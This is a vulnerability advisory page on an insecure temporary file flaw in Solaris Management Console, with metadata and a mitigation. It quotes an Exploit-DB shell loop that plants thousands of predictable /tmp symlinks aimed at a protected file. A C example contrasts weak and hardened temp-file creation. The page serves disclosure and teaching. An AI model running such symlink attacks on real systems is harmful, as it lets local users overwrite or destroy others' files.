Vendor: Solaris
By: Unknown
CVSS: 5.5 (MEDIUM)
Insecure Temporary File Creation
CWE: 377
Product Name: Solaris
Affected Version From: Solaris 9
Affected Version To: Solaris 10
Patch Exists: YES
Related CWE: CVE-2010-0251
CPE: o:oracle:solaris
2010

Insecure Temporary File Creation in Solaris Management Console

The 'Solaris Management Console' subcomponent of Oracle Solaris creates temporary files in an insecure manner. An attacker with local access can exploit this issue to overwrite arbitrary files, leading to denial-of-service conditions or aiding in other attacks.

Mitigation:

Upgrade to a patched version of Oracle Solaris.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41642/info

The 'Solaris Management Console' subcomponent of Oracle Solaris creates temporary files in an insecure manner.

An attacker with local access can exploit this issue to overwrite arbitrary files. This may result in denial-of-service conditions or could aid in other attacks.

Solaris 9 and 10 are affected.

   $ id
   uid=101(fstuart) gid=14(sysadmin)
   $ cd /tmp
   $ x=0
   $ while [ "$x" -ne 30000 ] ;do
   > ln -s /etc/important /tmp/dummy.$x
   > x=$(expr "$x" + 1)
   > done
   $ ls -dl /etc/important
   -rw-r--r--   1 root     root          38 Jan  3 22:43 /etc/important
   $ cat /etc/important
      This is an important file!

      EOF
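
The defect class and its fix, as an added example that is not from the advisory and not Solaris Management Console code: a creator that opens a predictable temporary name follows a symlink planted at that name (like the `dummy.$x` links above) and truncates the target, while `O_CREAT|O_EXCL|O_NOFOLLOW` or `mkstemp()` does not. The scratch directory, file names and function names are constructed for the demonstration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak pattern: a predictable name opened without O_EXCL. open() follows a
 * symlink planted at that name and O_TRUNC empties whatever it points to. */
int create_tmp_weak(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: O_EXCL fails with EEXIST if the name already exists, symlink
 * included; O_NOFOLLOW also refuses a symlink as the final path component. */
int create_tmp_excl(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Preferred: mkstemp() picks an unpredictable name and creates it exclusively. */
int create_tmp_mkstemp(char *tmpl) {
    return mkstemp(tmpl);
}

/* Constructed scenario in a private scratch directory: "important" stands in
 * for the protected file, "dummy.1234" for the predictable temporary name.
 * Returns the size of "important" after the creator ran, -1 on setup error. */
long demo(int hardened) {
    char dir[] = "/tmp/tmpfile-demo-XXXXXX", target[64], lnk[64];
    struct stat st;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(target, sizeof target, "%s/important", dir);
    snprintf(lnk, sizeof lnk, "%s/dummy.1234", dir);
    FILE *f = fopen(target, "w");
    if (f == NULL) return -1;
    fputs("This is an important file!\n", f);   /* 27 bytes */
    fclose(f);
    if (symlink(target, lnk) != 0) return -1;
    int fd = hardened ? create_tmp_excl(lnk) : create_tmp_weak(lnk);
    if (fd >= 0) close(fd);
    long size = stat(target, &st) == 0 ? (long)st.st_size : -1;
    unlink(lnk); unlink(target); rmdir(dir);
    return size;
}

int main(void) {
    printf("weak creator:     target is %ld bytes\n", demo(0));
    printf("hardened creator: target is %ld bytes\n", demo(1));
    return 0;
}
```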